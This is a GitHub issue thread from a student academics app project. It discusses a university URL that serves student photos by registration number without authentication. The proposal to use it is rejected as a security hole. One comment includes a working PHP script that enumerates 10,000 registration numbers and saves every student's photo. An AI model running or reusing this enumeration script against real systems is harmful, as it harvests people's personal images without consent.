### ISSUE TITLE
User's profile picture

### ISSUE THREAD

**Issue by aneesh-neelam** [aneesh-neelam/VITacademics#104]
The user's picture can easily be found using the register number. 

Just use the following URL, no login or authentication is required: 
[https://academics.vit.ac.in/student/view_photo_2.asp?rgno=](https://academics.vit.ac.in/student/view_photo_2.asp?rgno=){regno}

Substitute {regno} with the user's registration number. This is for Vellore campus, I'm sure it'll work similarly for Chennai campus also. 

@ayushagarwal95, @saurabhsjoshi, @gauravagerwala, @biocross, @VinayGupta23: I propose the client apps get the picture from the link directly and put it up in the app, like in Android's case a small profile picture in the navigation header.

**Comment by metamemelord** [comment]
Unfortunately, this script probably does not work for Chennai Campus.  I tried invoking images of 3 students registered in Chennai Campus.  It doesn't not return any result.

**Comment by aneesh-neelam** [comment]
No, what I mean is Chennai Campus has a different URL for Student/Parent/Faculty Login. It's here: http://27.251.102.132/, but the same sub-URL isn't present.

**Comment by biocross** [comment]
Don't use this. This is a serious security hole on their side. Also these photos are usually embarrassing and nobody wants them on their app.

**Comment by VinayGupta23** [comment]
+1 for the second point! :P

Sent from my Windows Phone

**Comment by aneesh-neelam** [comment]
Yeah, that's true. Vote to reject proposal passed then.

**Comment by rahulkapoor90** [comment]
<?php
ini_set('max_execution_time', 3000);
$url = "https://academics.vit.ac.in/student/view_photo_2.asp?rgno=14bit";
for($i = 1; $i < 10000; $i++){
    $res = $url.str_pad($i,4,0,STR_PAD_LEFT);
    file_put_contents($i.".jpg", fopen($res, 'r')); 
}
?>
I tried this a while back and it saves them.

**Comment by aneesh-neelam** [comment]
We don't need them.

**Comment by rahulkapoor90** [comment]
Okay.
